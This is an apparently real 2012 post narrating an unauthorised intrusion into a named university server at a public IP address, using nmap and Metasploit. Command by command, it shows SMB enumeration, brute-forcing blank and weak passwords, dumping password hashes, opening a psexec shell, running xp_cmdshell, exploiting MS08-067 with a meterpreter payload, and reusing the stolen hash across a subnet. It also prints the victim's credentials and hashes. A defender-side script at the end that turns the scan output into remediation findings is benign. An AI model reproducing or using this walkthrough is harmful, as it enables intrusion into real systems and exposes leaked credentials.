nmap+msf intrusion of Guangxi Normal University
Posted on 2012-12-4 12:46:42
Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
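Added here as a defender-side example, not part of the original post: a small Python script that reads the kind of nmap host-script output shown above and turns each exposed weakness (open SMB/RDP ports, anonymous IPC$ access, blank or guessable passwords, MS08-067 missing) into a prioritised remediation finding. The sample text is constructed from the output above; the LM-hash check relies on the fact that the second half of an LM hash is the fixed value AAD3B435B51404EE whenever the password is 7 characters or shorter.

```python
import re

# Constructed sample: a condensed copy of the nmap output shown in the post above
SAMPLE_OUTPUT = """\
PORT     STATE SERVICE
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
Host script results:
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|_test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

# Second half of an LM hash is this constant when the password has at most 7 characters
LM_EMPTY_HALF = "AAD3B435B51404EE"
SERVICES = {"139": "NetBIOS", "445": "SMB", "3389": "RDP"}

def parse_findings(text):
    """Turn nmap port lines and SMB host-script results into (severity, message) findings."""
    findings, share = [], None
    for raw in text.splitlines():
        line = raw.strip("|_ ").strip()          # drop the "| " / "|_ " script-output prefix
        port = re.match(r"^(\d+)/tcp\s+open", line)
        brute = re.match(r"^(\S+):(\S+) => Login was successful$", line)
        dump = re.match(r"^(\S+):(\d+) => ([^:]+):(.+)$", line)
        if port and port.group(1) in SERVICES:
            findings.append(("medium", f"{SERVICES[port.group(1)]} on tcp/{port.group(1)} is reachable; filter it at the perimeter"))
        elif line.endswith("$"):                 # share name, remembered for the next access line
            share = line
        elif line.startswith("Anonymous access:") and not line.endswith("<none>"):
            findings.append(("high", f"share {share} allows anonymous {line.split()[-1]}; restrict anonymous access"))
        elif brute and brute.group(2) == "<blank>":
            findings.append(("critical", f"account {brute.group(1)} has an empty password; set a strong one"))
        elif brute:
            findings.append(("high", f"account {brute.group(1)} uses a guessable password; enforce password policy"))
        elif dump and "NO PASSWORD" in dump.group(3):
            findings.append(("critical", f"account {dump.group(1)} (RID {dump.group(2)}) has no password set"))
        elif dump and dump.group(3)[16:] == LM_EMPTY_HALF:
            findings.append(("high", f"account {dump.group(1)} has an LM hash of a password of 7 chars or fewer; disable LM hashes (NoLMHash) and rotate"))
        elif line.endswith(": VULNERABLE"):
            findings.append(("critical", f"{line.split(':')[0]} is unpatched; install the update"))
    return findings

def count_by_severity(findings):
    """Count findings per severity so the report can be prioritised."""
    counts = {}
    for sev, _ in findings:
        counts[sev] = counts.get(sev, 0) + 1
    return counts

if __name__ == "__main__":
    for sev, msg in parse_findings(SAMPLE_OUTPUT):
        print(f"[{sev.upper()}] {msg}")
    print(count_by_severity(parse_findings(SAMPLE_OUTPUT)))
```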